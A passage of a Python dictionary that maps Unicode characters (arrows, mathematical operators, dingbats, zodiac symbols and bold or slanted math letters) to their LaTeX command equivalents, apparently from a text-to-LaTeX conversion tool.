u"\u205F":"\\mkern4mu",
u"\u2060":"\\nolinebreak",
u"\u20A7":"\\ensuremath{\\Elzpes}",
u"\u20AC":"\\mbox{\\texteuro}",
u"\u20DB":"\\dddot",
u"\u20DC":"\\ddddot",
u"\u2102":"\\mathbb{C}",
u"\u210A":"\\mathscr{g}",
u"\u210B":"\\mathscr{H}",
u"\u210C":"\\mathfrak{H}",
u"\u210D":"\\mathbb{H}",
u"\u210F":"\\hslash",
u"\u2110":"\\mathscr{I}",
u"\u2111":"\\mathfrak{I}",
u"\u2112":"\\mathscr{L}",
u"\u2113":"\\mathscr{l}",
u"\u2115":"\\mathbb{N}",
u"\u2116":"\\cyrchar\\textnumero",
u"\u2118":"\\wp",
u"\u2119":"\\mathbb{P}",
u"\u211A":"\\mathbb{Q}",
u"\u211B":"\\mathscr{R}",
u"\u211C":"\\mathfrak{R}",
u"\u211D":"\\mathbb{R}",
u"\u211E":"\\Elzxrat",
u"\u2122":"\\texttrademark",
u"\u2124":"\\mathbb{Z}",
u"\u2126":"\\Omega",
u"\u2127":"\\mho",
u"\u2128":"\\mathfrak{Z}",
u"\u2129":"\\ElsevierGlyph{2129}",
u"\u212B":"\\AA",
u"\u212C":"\\mathscr{B}",
u"\u212D":"\\mathfrak{C}",
u"\u212F":"\\mathscr{e}",
u"\u2130":"\\mathscr{E}",
u"\u2131":"\\mathscr{F}",
u"\u2133":"\\mathscr{M}",
u"\u2134":"\\mathscr{o}",
u"\u2135":"\\aleph",
u"\u2136":"\\beth",
u"\u2137":"\\gimel",
u"\u2138":"\\daleth",
u"\u2153":"\\textfrac{1}{3}",
u"\u2154":"\\textfrac{2}{3}",
u"\u2155":"\\textfrac{1}{5}",
u"\u2156":"\\textfrac{2}{5}",
u"\u2157":"\\textfrac{3}{5}",
u"\u2158":"\\textfrac{4}{5}",
u"\u2159":"\\textfrac{1}{6}",
u"\u215A":"\\textfrac{5}{6}",
u"\u215B":"\\textfrac{1}{8}",
u"\u215C":"\\textfrac{3}{8}",
u"\u215D":"\\textfrac{5}{8}",
u"\u215E":"\\textfrac{7}{8}",
u"\u2190":"\\leftarrow",
u"\u2191":"\\uparrow",
u"\u2192":"\\rightarrow",
u"\u2193":"\\downarrow",
u"\u2194":"\\leftrightarrow",
u"\u2195":"\\updownarrow",
u"\u2196":"\\nwarrow",
u"\u2197":"\\nearrow",
u"\u2198":"\\searrow",
u"\u2199":"\\swarrow",
u"\u219A":"\\nleftarrow",
u"\u219B":"\\nrightarrow",
u"\u219C":"\\arrowwaveright",
u"\u219D":"\\arrowwaveright",
u"\u219E":"\\twoheadleftarrow",
u"\u21A0":"\\twoheadrightarrow",
u"\u21A2":"\\leftarrowtail",
u"\u21A3":"\\rightarrowtail",
u"\u21A6":"\\mapsto",
u"\u21A9":"\\hookleftarrow",
u"\u21AA":"\\hookrightarrow",
u"\u21AB":"\\looparrowleft",
u"\u21AC":"\\looparrowright",
u"\u21AD":"\\leftrightsquigarrow",
u"\u21AE":"\\nleftrightarrow",
u"\u21B0":"\\Lsh",
u"\u21B1":"\\Rsh",
u"\u21B3":"\\ElsevierGlyph{21B3}",
u"\u21B6":"\\curvearrowleft",
u"\u21B7":"\\curvearrowright",
u"\u21BA":"\\circlearrowleft",
u"\u21BB":"\\circlearrowright",
u"\u21BC":"\\leftharpoonup",
u"\u21BD":"\\leftharpoondown",
u"\u21BE":"\\upharpoonright",
u"\u21BF":"\\upharpoonleft",
u"\u21C0":"\\rightharpoonup",
u"\u21C1":"\\rightharpoondown",
u"\u21C2":"\\downharpoonright",
u"\u21C3":"\\downharpoonleft",
u"\u21C4":"\\rightleftarrows",
u"\u21C5":"\\dblarrowupdown",
u"\u21C6":"\\leftrightarrows",
u"\u21C7":"\\leftleftarrows",
u"\u21C8":"\\upuparrows",
u"\u21C9":"\\rightrightarrows",
u"\u21CA":"\\downdownarrows",
u"\u21CB":"\\leftrightharpoons",
u"\u21CC":"\\rightleftharpoons",
u"\u21CD":"\\nLeftarrow",
u"\u21CE":"\\nLeftrightarrow",
u"\u21CF":"\\nRightarrow",
u"\u21D0":"\\Leftarrow",
u"\u21D1":"\\Uparrow",
u"\u21D2":"\\Rightarrow",
u"\u21D3":"\\Downarrow",
u"\u21D4":"\\Leftrightarrow",
u"\u21D5":"\\Updownarrow",
u"\u21DA":"\\Lleftarrow",
u"\u21DB":"\\Rrightarrow",
u"\u21DD":"\\rightsquigarrow",
u"\u21F5":"\\DownArrowUpArrow",
u"\u2200":"\\forall",
u"\u2201":"\\complement",
u"\u2202":"\\partial",
u"\u2203":"\\exists",
u"\u2204":"\\nexists",
u"\u2205":"\\varnothing",
u"\u2207":"\\nabla",
u"\u2208":"\\in",
u"\u2209":"\\not\\in",
u"\u220B":"\\ni",
u"\u220C":"\\not\\ni",
u"\u220F":"\\prod",
u"\u2210":"\\coprod",
u"\u2211":"\\sum",
u"\u2213":"\\mp",
u"\u2214":"\\dotplus",
u"\u2216":"\\setminus",
u"\u2217":"{_\\ast}",
u"\u2218":"\\circ",
u"\u2219":"\\bullet",
u"\u221A":"\\surd",
u"\u221D":"\\propto",
u"\u221E":"\\infty",
u"\u221F":"\\rightangle",
u"\u2220":"\\angle",
u"\u2221":"\\measuredangle",
u"\u2222":"\\sphericalangle",
u"\u2223":"\\mid",
u"\u2224":"\\nmid",
u"\u2225":"\\parallel",
u"\u2226":"\\nparallel",
u"\u2227":"\\wedge",
u"\u2228":"\\vee",
u"\u2229":"\\cap",
u"\u222A":"\\cup",
u"\u222B":"\\int",
u"\u222C":"\\int\\!\\int",
u"\u222D":"\\int\\!\\int\\!\\int",
u"\u222E":"\\oint",
u"\u222F":"\\surfintegral",
u"\u2230":"\\volintegral",
u"\u2231":"\\clwintegral",
u"\u2232":"\\ElsevierGlyph{2232}",
u"\u2233":"\\ElsevierGlyph{2233}",
u"\u2234":"\\therefore",
u"\u2235":"\\because",
u"\u2237":"\\Colon",
u"\u2238":"\\ElsevierGlyph{2238}",
u"\u223A":"\\mathbin{{:}\\!\\!{-}\\!\\!{:}}",
u"\u223B":"\\homothetic",
u"\u223C":"\\sim",
u"\u223D":"\\backsim",
u"\u223E":"\\lazysinv",
u"\u2240":"\\wr",
u"\u2241":"\\not\\sim",
u"\u2242":"\\ElsevierGlyph{2242}",
u"\u2242-00338":"\\NotEqualTilde",
u"\u2243":"\\simeq",
u"\u2244":"\\not\\simeq",
u"\u2245":"\\cong",
u"\u2246":"\\approxnotequal",
u"\u2247":"\\not\\cong",
u"\u2248":"\\approx",
u"\u2249":"\\not\\approx",
u"\u224A":"\\approxeq",
u"\u224B":"\\tildetrpl",
u"\u224B-00338":"\\not\\apid",
u"\u224C":"\\allequal",
u"\u224D":"\\asymp",
u"\u224E":"\\Bumpeq",
u"\u224E-00338":"\\NotHumpDownHump",
u"\u224F":"\\bumpeq",
u"\u224F-00338":"\\NotHumpEqual",
u"\u2250":"\\doteq",
u"\u2250-00338":"\\not\\doteq",
u"\u2251":"\\doteqdot",
u"\u2252":"\\fallingdotseq",
u"\u2253":"\\risingdotseq",
u"\u2254":":=",
u"\u2255":"=:",
u"\u2256":"\\eqcirc",
u"\u2257":"\\circeq",
u"\u2259":"\\estimates",
u"\u225A":"\\ElsevierGlyph{225A}",
u"\u225B":"\\starequal",
u"\u225C":"\\triangleq",
u"\u225F":"\\ElsevierGlyph{225F}",
u"\u2260":"\\not =",
u"\u2261":"\\equiv",
u"\u2262":"\\not\\equiv",
u"\u2264":"\\leq",
u"\u2265":"\\geq",
u"\u2266":"\\leqq",
u"\u2267":"\\geqq",
u"\u2268":"\\lneqq",
u"\u2268-0FE00":"\\lvertneqq",
u"\u2269":"\\gneqq",
u"\u2269-0FE00":"\\gvertneqq",
u"\u226A":"\\ll",
u"\u226A-00338":"\\NotLessLess",
u"\u226B":"\\gg",
u"\u226B-00338":"\\NotGreaterGreater",
u"\u226C":"\\between",
u"\u226D":"\\not\\kern-0.3em\\times",
u"\u226E":"\\not<",
u"\u226F":"\\not>",
u"\u2270":"\\not\\leq",
u"\u2271":"\\not\\geq",
u"\u2272":"\\lessequivlnt",
u"\u2273":"\\greaterequivlnt",
u"\u2274":"\\ElsevierGlyph{2274}",
u"\u2275":"\\ElsevierGlyph{2275}",
u"\u2276":"\\lessgtr",
u"\u2277":"\\gtrless",
u"\u2278":"\\notlessgreater",
u"\u2279":"\\notgreaterless",
u"\u227A":"\\prec",
u"\u227B":"\\succ",
u"\u227C":"\\preccurlyeq",
u"\u227D":"\\succcurlyeq",
u"\u227E":"\\precapprox",
u"\u227E-00338":"\\NotPrecedesTilde",
u"\u227F":"\\succapprox",
u"\u227F-00338":"\\NotSucceedsTilde",
u"\u2280":"\\not\\prec",
u"\u2281":"\\not\\succ",
u"\u2282":"\\subset",
u"\u2283":"\\supset",
u"\u2284":"\\not\\subset",
u"\u2285":"\\not\\supset",
u"\u2286":"\\subseteq",
u"\u2287":"\\supseteq",
u"\u2288":"\\not\\subseteq",
u"\u2289":"\\not\\supseteq",
u"\u228A":"\\subsetneq",
u"\u228A-0FE00":"\\varsubsetneqq",
u"\u228B":"\\supsetneq",
u"\u228B-0FE00":"\\varsupsetneq",
u"\u228E":"\\uplus",
u"\u228F":"\\sqsubset",
u"\u228F-00338":"\\NotSquareSubset",
u"\u2290":"\\sqsupset",
u"\u2290-00338":"\\NotSquareSuperset",
u"\u2291":"\\sqsubseteq",
u"\u2292":"\\sqsupseteq",
u"\u2293":"\\sqcap",
u"\u2294":"\\sqcup",
u"\u2295":"\\oplus",
u"\u2296":"\\ominus",
u"\u2297":"\\otimes",
u"\u2298":"\\oslash",
u"\u2299":"\\odot",
u"\u229A":"\\circledcirc",
u"\u229B":"\\circledast",
u"\u229D":"\\circleddash",
u"\u229E":"\\boxplus",
u"\u229F":"\\boxminus",
u"\u22A0":"\\boxtimes",
u"\u22A1":"\\boxdot",
u"\u22A2":"\\vdash",
u"\u22A3":"\\dashv",
u"\u22A4":"\\top",
u"\u22A5":"\\perp",
u"\u22A7":"\\truestate",
u"\u22A8":"\\forcesextra",
u"\u22A9":"\\Vdash",
u"\u22AA":"\\Vvdash",
u"\u22AB":"\\VDash",
u"\u22AC":"\\nvdash",
u"\u22AD":"\\nvDash",
u"\u22AE":"\\nVdash",
u"\u22AF":"\\nVDash",
u"\u22B2":"\\vartriangleleft",
u"\u22B3":"\\vartriangleright",
u"\u22B4":"\\trianglelefteq",
u"\u22B5":"\\trianglerighteq",
u"\u22B6":"\\original",
u"\u22B7":"\\image",
u"\u22B8":"\\multimap",
u"\u22B9":"\\hermitconjmatrix",
u"\u22BA":"\\intercal",
u"\u22BB":"\\veebar",
u"\u22BE":"\\rightanglearc",
u"\u22C0":"\\ElsevierGlyph{22C0}",
u"\u22C1":"\\ElsevierGlyph{22C1}",
u"\u22C2":"\\bigcap",
u"\u22C3":"\\bigcup",
u"\u22C4":"\\diamond",
u"\u22C5":"\\cdot",
u"\u22C6":"\\star",
u"\u22C7":"\\divideontimes",
u"\u22C8":"\\bowtie",
u"\u22C9":"\\ltimes",
u"\u22CA":"\\rtimes",
u"\u22CB":"\\leftthreetimes",
u"\u22CC":"\\rightthreetimes",
u"\u22CD":"\\backsimeq",
u"\u22CE":"\\curlyvee",
u"\u22CF":"\\curlywedge",
u"\u22D0":"\\Subset",
u"\u22D1":"\\Supset",
u"\u22D2":"\\Cap",
u"\u22D3":"\\Cup",
u"\u22D4":"\\pitchfork",
u"\u22D6":"\\lessdot",
u"\u22D7":"\\gtrdot",
u"\u22D8":"\\verymuchless",
u"\u22D9":"\\verymuchgreater",
u"\u22DA":"\\lesseqgtr",
u"\u22DB":"\\gtreqless",
u"\u22DE":"\\curlyeqprec",
u"\u22DF":"\\curlyeqsucc",
u"\u22E2":"\\not\\sqsubseteq",
u"\u22E3":"\\not\\sqsupseteq",
u"\u22E5":"\\Elzsqspne",
u"\u22E6":"\\lnsim",
u"\u22E7":"\\gnsim",
u"\u22E8":"\\precedesnotsimilar",
u"\u22E9":"\\succnsim",
u"\u22EA":"\\ntriangleleft",
u"\u22EB":"\\ntriangleright",
u"\u22EC":"\\ntrianglelefteq",
u"\u22ED":"\\ntrianglerighteq",
u"\u22EE":"\\vdots",
u"\u22EF":"\\cdots",
u"\u22F0":"\\upslopeellipsis",
u"\u22F1":"\\downslopeellipsis",
u"\u2305":"\\barwedge",
u"\u2306":"\\perspcorrespond",
u"\u2308":"\\lceil",
u"\u2309":"\\rceil",
u"\u230A":"\\lfloor",
u"\u230B":"\\rfloor",
u"\u2315":"\\recorder",
u"\u231C":"\\ulcorner",
u"\u231D":"\\urcorner",
u"\u231E":"\\llcorner",
u"\u231F":"\\lrcorner",
u"\u2322":"\\frown",
u"\u2323":"\\smile",
u"\u2329":"\\langle",
u"\u232A":"\\rangle",
u"\u233D":"\\ElsevierGlyph{E838}",
u"\u23A3":"\\Elzdlcorn",
u"\u23B0":"\\lmoustache",
u"\u23B1":"\\rmoustache",
u"\u2423":"\\textvisiblespace",
u"\u2460":"\\ding{172}",
u"\u2461":"\\ding{173}",
u"\u2462":"\\ding{174}",
u"\u2463":"\\ding{175}",
u"\u2464":"\\ding{176}",
u"\u2465":"\\ding{177}",
u"\u2466":"\\ding{178}",
u"\u2467":"\\ding{179}",
u"\u2468":"\\ding{180}",
u"\u2469":"\\ding{181}",
u"\u24C8":"\\circledS",
u"\u2506":"\\Elzdshfnc",
u"\u2519":"\\Elzsqfnw",
u"\u2571":"\\diagup",
u"\u25A0":"\\ding{110}",
u"\u25A1":"\\square",
u"\u25AA":"\\blacksquare",
u"\u25AD":"\\fbox{~~}",
u"\u25AF":"\\Elzvrecto",
u"\u25B1":"\\ElsevierGlyph{E381}",
u"\u25B2":"\\ding{115}",
u"\u25B3":"\\bigtriangleup",
u"\u25B4":"\\blacktriangle",
u"\u25B5":"\\vartriangle",
u"\u25B8":"\\blacktriangleright",
u"\u25B9":"\\triangleright",
u"\u25BC":"\\ding{116}",
u"\u25BD":"\\bigtriangledown",
u"\u25BE":"\\blacktriangledown",
u"\u25BF":"\\triangledown",
u"\u25C2":"\\blacktriangleleft",
u"\u25C3":"\\triangleleft",
u"\u25C6":"\\ding{117}",
u"\u25CA":"\\lozenge",
u"\u25CB":"\\bigcirc",
u"\u25CF":"\\ding{108}",
u"\u25D0":"\\Elzcirfl",
u"\u25D1":"\\Elzcirfr",
u"\u25D2":"\\Elzcirfb",
u"\u25D7":"\\ding{119}",
u"\u25D8":"\\Elzrvbull",
u"\u25E7":"\\Elzsqfl",
u"\u25E8":"\\Elzsqfr",
u"\u25EA":"\\Elzsqfse",
u"\u25EF":"\\bigcirc",
u"\u2605":"\\ding{72}",
u"\u2606":"\\ding{73}",
u"\u260E":"\\ding{37}",
u"\u261B":"\\ding{42}",
u"\u261E":"\\ding{43}",
u"\u263E":"\\rightmoon",
u"\u263F":"\\mercury",
u"\u2640":"\\venus",
u"\u2642":"\\male",
u"\u2643":"\\jupiter",
u"\u2644":"\\saturn",
u"\u2645":"\\uranus",
u"\u2646":"\\neptune",
u"\u2647":"\\pluto",
u"\u2648":"\\aries",
u"\u2649":"\\taurus",
u"\u264A":"\\gemini",
u"\u264B":"\\cancer",
u"\u264C":"\\leo",
u"\u264D":"\\virgo",
u"\u264E":"\\libra",
u"\u264F":"\\scorpio",
u"\u2650":"\\sagittarius",
u"\u2651":"\\capricornus",
u"\u2652":"\\aquarius",
u"\u2653":"\\pisces",
u"\u2660":"\\ding{171}",
u"\u2662":"\\diamond",
u"\u2663":"\\ding{168}",
u"\u2665":"\\ding{170}",
u"\u2666":"\\ding{169}",
u"\u2669":"\\quarternote",
u"\u266A":"\\eighthnote",
u"\u266D":"\\flat",
u"\u266E":"\\natural",
u"\u266F":"\\sharp",
u"\u2701":"\\ding{33}",
u"\u2702":"\\ding{34}",
u"\u2703":"\\ding{35}",
u"\u2704":"\\ding{36}",
u"\u2706":"\\ding{38}",
u"\u2707":"\\ding{39}",
u"\u2708":"\\ding{40}",
u"\u2709":"\\ding{41}",
u"\u270C":"\\ding{44}",
u"\u270D":"\\ding{45}",
u"\u270E":"\\ding{46}",
u"\u270F":"\\ding{47}",
u"\u2710":"\\ding{48}",
u"\u2711":"\\ding{49}",
u"\u2712":"\\ding{50}",
u"\u2713":"\\ding{51}",
u"\u2714":"\\ding{52}",
u"\u2715":"\\ding{53}",
u"\u2716":"\\ding{54}",
u"\u2717":"\\ding{55}",
u"\u2718":"\\ding{56}",
u"\u2719":"\\ding{57}",
u"\u271A":"\\ding{58}",
u"\u271B":"\\ding{59}",
u"\u271C":"\\ding{60}",
u"\u271D":"\\ding{61}",
u"\u271E":"\\ding{62}",
u"\u271F":"\\ding{63}",
u"\u2720":"\\ding{64}",
u"\u2721":"\\ding{65}",
u"\u2722":"\\ding{66}",
u"\u2723":"\\ding{67}",
u"\u2724":"\\ding{68}",
u"\u2725":"\\ding{69}",
u"\u2726":"\\ding{70}",
u"\u2727":"\\ding{71}",
u"\u2729":"\\ding{73}",
u"\u272A":"\\ding{74}",
u"\u272B":"\\ding{75}",
u"\u272C":"\\ding{76}",
u"\u272D":"\\ding{77}",
u"\u272E":"\\ding{78}",
u"\u272F":"\\ding{79}",
u"\u2730":"\\ding{80}",
u"\u2731":"\\ding{81}",
u"\u2732":"\\ding{82}",
u"\u2733":"\\ding{83}",
u"\u2734":"\\ding{84}",
u"\u2735":"\\ding{85}",
u"\u2736":"\\ding{86}",
u"\u2737":"\\ding{87}",
u"\u2738":"\\ding{88}",
u"\u2739":"\\ding{89}",
u"\u273A":"\\ding{90}",
u"\u273B":"\\ding{91}",
u"\u273C":"\\ding{92}",
u"\u273D":"\\ding{93}",
u"\u273E":"\\ding{94}",
u"\u273F":"\\ding{95}",
u"\u2740":"\\ding{96}",
u"\u2741":"\\ding{97}",
u"\u2742":"\\ding{98}",
u"\u2743":"\\ding{99}",
u"\u2744":"\\ding{100}",
u"\u2745":"\\ding{101}",
u"\u2746":"\\ding{102}",
u"\u2747":"\\ding{103}",
u"\u2748":"\\ding{104}",
u"\u2749":"\\ding{105}",
u"\u274A":"\\ding{106}",
u"\u274B":"\\ding{107}",
u"\u274D":"\\ding{109}",
u"\u274F":"\\ding{111}",
u"\u2750":"\\ding{112}",
u"\u2751":"\\ding{113}",
u"\u2752":"\\ding{114}",
u"\u2756":"\\ding{118}",
u"\u2758":"\\ding{120}",
u"\u2759":"\\ding{121}",
u"\u275A":"\\ding{122}",
u"\u275B":"\\ding{123}",
u"\u275C":"\\ding{124}",
u"\u275D":"\\ding{125}",
u"\u275E":"\\ding{126}",
u"\u2761":"\\ding{161}",
u"\u2762":"\\ding{162}",
u"\u2763":"\\ding{163}",
u"\u2764":"\\ding{164}",
u"\u2765":"\\ding{165}",
u"\u2766":"\\ding{166}",
u"\u2767":"\\ding{167}",
u"\u2776":"\\ding{182}",
u"\u2777":"\\ding{183}",
u"\u2778":"\\ding{184}",
u"\u2779":"\\ding{185}",
u"\u277A":"\\ding{186}",
u"\u277B":"\\ding{187}",
u"\u277C":"\\ding{188}",
u"\u277D":"\\ding{189}",
u"\u277E":"\\ding{190}",
u"\u277F":"\\ding{191}",
u"\u2780":"\\ding{192}",
u"\u2781":"\\ding{193}",
u"\u2782":"\\ding{194}",
u"\u2783":"\\ding{195}",
u"\u2784":"\\ding{196}",
u"\u2785":"\\ding{197}",
u"\u2786":"\\ding{198}",
u"\u2787":"\\ding{199}",
u"\u2788":"\\ding{200}",
u"\u2789":"\\ding{201}",
u"\u278A":"\\ding{202}",
u"\u278B":"\\ding{203}",
u"\u278C":"\\ding{204}",
u"\u278D":"\\ding{205}",
u"\u278E":"\\ding{206}",
u"\u278F":"\\ding{207}",
u"\u2790":"\\ding{208}",
u"\u2791":"\\ding{209}",
u"\u2792":"\\ding{210}",
u"\u2793":"\\ding{211}",
u"\u2794":"\\ding{212}",
u"\u2798":"\\ding{216}",
u"\u2799":"\\ding{217}",
u"\u279A":"\\ding{218}",
u"\u279B":"\\ding{219}",
u"\u279C":"\\ding{220}",
u"\u279D":"\\ding{221}",
u"\u279E":"\\ding{222}",
u"\u279F":"\\ding{223}",
u"\u27A0":"\\ding{224}",
u"\u27A1":"\\ding{225}",
u"\u27A2":"\\ding{226}",
u"\u27A3":"\\ding{227}",
u"\u27A4":"\\ding{228}",
u"\u27A5":"\\ding{229}",
u"\u27A6":"\\ding{230}",
u"\u27A7":"\\ding{231}",
u"\u27A8":"\\ding{232}",
u"\u27A9":"\\ding{233}",
u"\u27AA":"\\ding{234}",
u"\u27AB":"\\ding{235}",
u"\u27AC":"\\ding{236}",
u"\u27AD":"\\ding{237}",
u"\u27AE":"\\ding{238}",
u"\u27AF":"\\ding{239}",
u"\u27B1":"\\ding{241}",
u"\u27B2":"\\ding{242}",
u"\u27B3":"\\ding{243}",
u"\u27B4":"\\ding{244}",
u"\u27B5":"\\ding{245}",
u"\u27B6":"\\ding{246}",
u"\u27B7":"\\ding{247}",
u"\u27B8":"\\ding{248}",
u"\u27B9":"\\ding{249}",
u"\u27BA":"\\ding{250}",
u"\u27BB":"\\ding{251}",
u"\u27BC":"\\ding{252}",
u"\u27BD":"\\ding{253}",
u"\u27BE":"\\ding{254}",
u"\u27F5":"\\longleftarrow",
u"\u27F6":"\\longrightarrow",
u"\u27F7":"\\longleftrightarrow",
u"\u27F8":"\\Longleftarrow",
u"\u27F9":"\\Longrightarrow",
u"\u27FA":"\\Longleftrightarrow",
u"\u27FC":"\\longmapsto",
u"\u27FF":"\\sim\\joinrel\\leadsto",
u"\u2905":"\\ElsevierGlyph{E212}",
u"\u2912":"\\UpArrowBar",
u"\u2913":"\\DownArrowBar",
u"\u2923":"\\ElsevierGlyph{E20C}",
u"\u2924":"\\ElsevierGlyph{E20D}",
u"\u2925":"\\ElsevierGlyph{E20B}",
u"\u2926":"\\ElsevierGlyph{E20A}",
u"\u2927":"\\ElsevierGlyph{E211}",
u"\u2928":"\\ElsevierGlyph{E20E}",
u"\u2929":"\\ElsevierGlyph{E20F}",
u"\u292A":"\\ElsevierGlyph{E210}",
u"\u2933":"\\ElsevierGlyph{E21C}",
u"\u2933-00338":"\\ElsevierGlyph{E21D}",
u"\u2936":"\\ElsevierGlyph{E21A}",
u"\u2937":"\\ElsevierGlyph{E219}",
u"\u2940":"\\Elolarr",
u"\u2941":"\\Elorarr",
u"\u2942":"\\ElzRlarr",
u"\u2944":"\\ElzrLarr",
u"\u2947":"\\Elzrarrx",
u"\u294E":"\\LeftRightVector",
u"\u294F":"\\RightUpDownVector",
u"\u2950":"\\DownLeftRightVector",
u"\u2951":"\\LeftUpDownVector",
u"\u2952":"\\LeftVectorBar",
u"\u2953":"\\RightVectorBar",
u"\u2954":"\\RightUpVectorBar",
u"\u2955":"\\RightDownVectorBar",
u"\u2956":"\\DownLeftVectorBar",
u"\u2957":"\\DownRightVectorBar",
u"\u2958":"\\LeftUpVectorBar",
u"\u2959":"\\LeftDownVectorBar",
u"\u295A":"\\LeftTeeVector",
u"\u295B":"\\RightTeeVector",
u"\u295C":"\\RightUpTeeVector",
u"\u295D":"\\RightDownTeeVector",
u"\u295E":"\\DownLeftTeeVector",
u"\u295F":"\\DownRightTeeVector",
u"\u2960":"\\LeftUpTeeVector",
u"\u2961":"\\LeftDownTeeVector",
u"\u296E":"\\UpEquilibrium",
u"\u296F":"\\ReverseUpEquilibrium",
u"\u2970":"\\RoundImplies",
u"\u297C":"\\ElsevierGlyph{E214}",
u"\u297D":"\\ElsevierGlyph{E215}",
u"\u2980":"\\Elztfnc",
u"\u2985":"\\ElsevierGlyph{3018}",
u"\u2986":"\\Elroang",
u"\u2993":"<\\kern-0.58em(",
u"\u2994":"\\ElsevierGlyph{E291}",
u"\u2999":"\\Elzddfnc",
u"\u299C":"\\Angle",
u"\u29A0":"\\Elzlpargt",
u"\u29B5":"\\ElsevierGlyph{E260}",
u"\u29B6":"\\ElsevierGlyph{E61B}",
u"\u29CA":"\\ElzLap",
u"\u29CB":"\\Elzdefas",
u"\u29CF":"\\LeftTriangleBar",
u"\u29CF-00338":"\\NotLeftTriangleBar",
u"\u29D0":"\\RightTriangleBar",
u"\u29D0-00338":"\\NotRightTriangleBar",
u"\u29DC":"\\ElsevierGlyph{E372}",
u"\u29EB":"\\blacklozenge",
u"\u29F4":"\\RuleDelayed",
u"\u2A04":"\\Elxuplus",
u"\u2A05":"\\ElzThr",
u"\u2A06":"\\Elxsqcup",
u"\u2A07":"\\ElzInf",
u"\u2A08":"\\ElzSup",
u"\u2A0D":"\\ElzCint",
u"\u2A0F":"\\clockoint",
u"\u2A10":"\\ElsevierGlyph{E395}",
u"\u2A16":"\\sqrint",
u"\u2A25":"\\ElsevierGlyph{E25A}",
u"\u2A2A":"\\ElsevierGlyph{E25B}",
u"\u2A2D":"\\ElsevierGlyph{E25C}",
u"\u2A2E":"\\ElsevierGlyph{E25D}",
u"\u2A2F":"\\ElzTimes",
u"\u2A34":"\\ElsevierGlyph{E25E}",
u"\u2A35":"\\ElsevierGlyph{E25E}",
u"\u2A3C":"\\ElsevierGlyph{E259}",
u"\u2A3F":"\\amalg",
u"\u2A53":"\\ElzAnd",
u"\u2A54":"\\ElzOr",
u"\u2A55":"\\ElsevierGlyph{E36E}",
u"\u2A56":"\\ElOr",
u"\u2A5E":"\\perspcorrespond",
u"\u2A5F":"\\Elzminhat",
u"\u2A63":"\\ElsevierGlyph{225A}",
u"\u2A6E":"\\stackrel{*}{=}",
u"\u2A75":"\\Equal",
u"\u2A7D":"\\leqslant",
u"\u2A7D-00338":"\\nleqslant",
u"\u2A7E":"\\geqslant",
u"\u2A7E-00338":"\\ngeqslant",
u"\u2A85":"\\lessapprox",
u"\u2A86":"\\gtrapprox",
u"\u2A87":"\\lneq",
u"\u2A88":"\\gneq",
u"\u2A89":"\\lnapprox",
u"\u2A8A":"\\gnapprox",
u"\u2A8B":"\\lesseqqgtr",
u"\u2A8C":"\\gtreqqless",
u"\u2A95":"\\eqslantless",
u"\u2A96":"\\eqslantgtr",
u"\u2A9D":"\\Pisymbol{ppi020}{117}",
u"\u2A9E":"\\Pisymbol{ppi020}{105}",
u"\u2AA1":"\\NestedLessLess",
u"\u2AA1-00338":"\\NotNestedLessLess",
u"\u2AA2":"\\NestedGreaterGreater",
u"\u2AA2-00338":"\\NotNestedGreaterGreater",
u"\u2AAF":"\\preceq",
u"\u2AAF-00338":"\\not\\preceq",
u"\u2AB0":"\\succeq",
u"\u2AB0-00338":"\\not\\succeq",
u"\u2AB5":"\\precneqq",
u"\u2AB6":"\\succneqq",
u"\u2AB7":"\\precapprox",
u"\u2AB8":"\\succapprox",
u"\u2AB9":"\\precnapprox",
u"\u2ABA":"\\succnapprox",
u"\u2AC5":"\\subseteqq",
u"\u2AC5-00338":"\\nsubseteqq",
u"\u2AC6":"\\supseteqq",
u"\u2AC6-00338":"\\nsupseteqq",
u"\u2ACB":"\\subsetneqq",
u"\u2ACC":"\\supsetneqq",
u"\u2AEB":"\\ElsevierGlyph{E30D}",
u"\u2AF6":"\\Elztdcol",
u"\u2AFD":"{{/}\\!\\!{/}}",
u"\u2AFD-020E5":"{\\rlap{\\textbackslash}{{/}\\!\\!{/}}}",
u"\u300A":"\\ElsevierGlyph{300A}",
u"\u300B":"\\ElsevierGlyph{300B}",
u"\u3018":"\\ElsevierGlyph{3018}",
u"\u3019":"\\ElsevierGlyph{3019}",
u"\u301A":"\\openbracketleft",
u"\u301B":"\\openbracketright",
u"\uD400":"\\mathbf{A}",
u"\uD401":"\\mathbf{B}",
u"\uD402":"\\mathbf{C}",
u"\uD403":"\\mathbf{D}",
u"\uD404":"\\mathbf{E}",
u"\uD405":"\\mathbf{F}",
u"\uD406":"\\mathbf{G}",
u"\uD407":"\\mathbf{H}",
u"\uD408":"\\mathbf{I}",
u"\uD409":"\\mathbf{J}",
u"\uD40A":"\\mathbf{K}",
u"\uD40B":"\\mathbf{L}",
u"\uD40C":"\\mathbf{M}",
u"\uD40D":"\\mathbf{N}",
u"\uD40E":"\\mathbf{O}",
u"\uD40F":"\\mathbf{P}",
u"\uD410":"\\mathbf{Q}",
u"\uD411":"\\mathbf{R}",
u"\uD412":"\\mathbf{S}",
u"\uD413":"\\mathbf{T}",
u"\uD414":"\\mathbf{U}",
u"\uD415":"\\mathbf{V}",
u"\uD416":"\\mathbf{W}",
u"\uD417":"\\mathbf{X}",
u"\uD418":"\\mathbf{Y}",
u"\uD419":"\\mathbf{Z}",
u"\uD41A":"\\mathbf{a}",
u"\uD41B":"\\mathbf{b}",
u"\uD41C":"\\mathbf{c}",
u"\uD41D":"\\mathbf{d}",
u"\uD41E":"\\mathbf{e}",
u"\uD41F":"\\mathbf{f}",
u"\uD420":"\\mathbf{g}",
u"\uD421":"\\mathbf{h}",
u"\uD422":"\\mathbf{i}",
u"\uD423":"\\mathbf{j}",
u"\uD424":"\\mathbf{k}",
u"\uD425":"\\mathbf{l}",
u"\uD426":"\\mathbf{m}",
u"\uD427":"\\mathbf{n}",
u"\uD428":"\\mathbf{o}",
u"\uD429":"\\mathbf{p}",
u"\uD42A":"\\mathbf{q}",
u"\uD42B":"\\mathbf{r}",
u"\uD42C":"\\mathbf{s}",
u"\uD42D":"\\mathbf{t}",
u"\uD42E":"\\mathbf{u}",
u"\uD42F":"\\mathbf{v}",
u"\uD430":"\\mathbf{w}",
u"\uD431":"\\mathbf{x}",
u"\uD432":"\\mathbf{y}",
u"\uD433":"\\mathbf{z}",
u"\uD434":"\\mathsl{A}",
u"\uD435":"\\mathsl{B}",
u"\uD436":"\\mathsl{C}",
u"\uD437":"\\mathsl{D}",
u"\uD438":"\\mathsl{E}",
u"\uD439":"\\mathsl{F}",
u"\uD43A":"\\mathsl{G}",
